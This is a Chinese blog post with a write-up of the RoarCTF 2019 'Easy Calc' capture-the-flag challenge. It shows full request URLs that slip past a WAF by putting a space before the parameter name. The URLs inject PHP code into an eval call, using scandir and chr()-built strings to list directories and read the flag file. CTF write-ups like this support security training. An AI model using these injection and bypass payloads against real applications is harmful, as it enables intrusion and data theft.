[RoarCTF 2019]Easy Calc 1

最新推荐文章于 2024-06-12 12:45:51 发布
最新推荐文章于 2024-06-12 12:45:51 发布
阅读量114 收藏
点赞数
分类专栏: WEB安全入门 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42900286/article/details/128903985
版权

在这里插入图片描述

解题过程

1.查看源码,发现calc.php
在这里插入图片描述
在这里插入图片描述
2.尝试输入命令,看能否执行
http://node4.buuoj.cn:25853/calc.php?num=phpinfo()
在这里插入图片描述
3.发现存在waf,进行绕过

PHP在接收URL传入的内容时,会将空格去除,将一些特殊字符转换为下划线(转换对象也包含空格)。
这里在num传参和?之后加入一个空格就可以绕过waf

http://node4.buuoj.cn:25853/calc.php?%20num=phpinfo()
在这里插入图片描述4.绕过之后读取flag,但是特殊字符也被过滤了,尝试使用chr()函数将ascii值转换为字符串进行拼接
payload

/calc.php?%20num=var_dump(scandir(chr(46).chr(47)))

scandir()  获取指定目录下的文件,返回数组
数组需要var_dump()或者print_r()函数进行打印
chr()将ascii值转换为字符串

5.寻找flag
http://node4.buuoj.cn:25853/calc.php?%20num=var_dump(scandir(chr(47)))
在这里插入图片描述

http://node4.buuoj.cn:25853/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
在这里插入图片描述

坤舆小菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RoarCTF 2019]Easy Calc1
weixin_61021815的博客
05-22 381
进入页面发现是一个计算器 猜测为sql注入(后来一想太过幼稚,他又不和数据库交互) 正在上传…重新上传取消 尝试了一下发现大多数字符都被过滤了 通过看被人的wp,发现可以通过抓包,发现了calc.php 访问一下 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str=$_GET['num']; $blacklist=['...
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1336
BUUCTF [RoarCTF 2019]Easy Calc1 WP
[RoarCTF 2019]Easy Calc1 wp
m0_73612768的博客
12-15 1348
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
Calc Easy-开源
05-29
一个相当简单的快速计算器实现示例。
calc1
02-12
calc1
demo_calc1
02-13
demo_calc1
CRC_Calc .rar
12-04
压缩包内包含CRC_Calc和CheckOut两种全面的CRC计算器,涵盖几乎所有类型的CRC算法的计算,方便快捷,
win32calc简繁版
09-07
Win32 版本的计算器,简洁易用,从 LTSC 版本剥离。如果厌恶臃肿华而不实的 UWP 版计算器,可以试试这个版本。
【BUUCTF】[RoarCTF 2019]Easy Calc1
aoao331198的博客
03-14 347
题目网页是一个计算器 查看源代码发现线索calc.php 直接访问 这里对eval对get的内容执行,尝试注入php代码 前面也说了waf,我们这里利用php解析字符串的特性来绕过 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
2024中国网络安全产品用户调查报告(发布版)
最新发布
2301_76786857的博客
06-12 691
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值